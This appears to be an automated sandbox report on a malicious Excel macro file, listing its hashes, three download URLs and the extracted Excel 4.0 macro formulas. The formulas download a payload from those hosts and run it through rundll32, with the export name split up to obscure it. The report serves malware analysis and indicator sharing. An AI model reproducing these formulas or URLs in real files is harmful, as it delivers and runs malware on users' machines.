General

  • Target

    test.xlsm

  • Size

    83KB

  • MD5

    8fbf9860fb4875112772af77f004da67

  • SHA1

    fd4b875e7c386e3321a623a3bf8e2d0c13d79d8a

  • SHA256

    66676f6cb631e7ff6a516495a780afcf23189458176b5ec68addb9f1395289e6

  • SHA512

    f7a5dfc21723b55440b8f4f310e954bb6d4088314838cb75e5f9c54dbb10d7f5f251aeb742717cde1d12ad922b9e9bb37e7145145e05bc53f1ef5c8c20e1c4f2

  • SSDEEP

    1536:Xycd7LWsqxG/+CbEcWeu3XDXeoiHwt/uE1d7mT6SrPag3HtQVASgVU:ii32G/+CbE9H78wt2E1d7e6STa6Sx

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://zml.laneso.com/packet/AlvJ8OdtSYEeeCQP/

http://ostadsarma.com/wp-admin/JNgASjNC/

http://govtjobresultbd.xyz/sjjz/UIUhOHsLqjOy9/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://zml.laneso.com/packet/AlvJ8OdtSYEeeCQP/","..\erum.ocx",0,0)
    =IF('EWDFFEFAD'!E18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ostadsarma.com/wp-admin/JNgASjNC/","..\erum.ocx",0,0))
    =IF('EWDFFEFAD'!E20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://govtjobresultbd.xyz/sjjz/UIUhOHsLqjOy9/","..\erum.ocx",0,0))
    =IF('EWDFFEFAD'!E22<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\rundll32.exe ..\erum.ocx,D""&""l""&""lR""&""egister""&""Serve""&""r")
    =RETURN()

Signatures

  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

Files

  • test.xlsm
    .xlsm office2007